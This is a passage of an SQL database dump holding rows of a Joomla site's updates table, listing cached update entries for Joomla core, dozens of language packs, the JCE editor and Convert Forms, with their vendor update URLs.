(1278, 18, 0, 'JCE 2.7.16', '', 'pkg_jce', 'package', '', 0, '2.7.16', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-16-released', ''),
(1279, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1280, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1281, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1282, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1283, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1284, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1285, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1286, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1287, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1288, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1289, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1290, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1291, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1292, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1293, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1294, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1295, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1296, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1297, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1298, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1299, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1300, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1301, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1302, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1303, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1304, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1305, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1306, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1307, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1308, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1309, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1310, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1311, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1312, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1313, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1314, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1315, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1316, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1317, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1318, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1319, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1320, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1321, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1322, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1323, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1324, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1325, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1326, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1327, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1328, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1329, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1330, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', '');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(1331, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1332, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1333, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1334, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1335, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1336, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1337, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1338, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1339, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1340, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1341, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1342, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1343, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1344, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1345, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1346, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1347, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1348, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1349, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1350, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1351, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1352, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1353, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1354, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1355, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1356, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1357, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1358, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1359, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1360, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1361, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1362, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1363, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1364, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1365, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1366, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1367, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1368, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1369, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1370, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1371, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1372, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1373, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1374, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1375, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1376, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1377, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1378, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1379, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1380, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1381, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1382, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1383, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1384, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1385, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1386, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1387, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1388, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1389, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1390, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1391, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1392, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1393, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1394, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1395, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1396, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1397, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1398, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1399, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1400, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1401, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1402, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1403, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1404, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1405, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1406, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1407, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1408, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1409, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1410, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1411, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1412, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1413, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1414, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1415, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1416, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1417, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1418, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1419, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1420, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1421, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1422, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1423, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.3.4', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=483', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1424, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1425, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1426, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1427, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1428, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1429, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1430, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1431, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1432, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1433, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1434, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1435, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1436, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1437, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1438, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1439, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1440, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1441, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1442, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1443, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1444, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1445, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1446, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1447, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1448, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1449, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1450, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
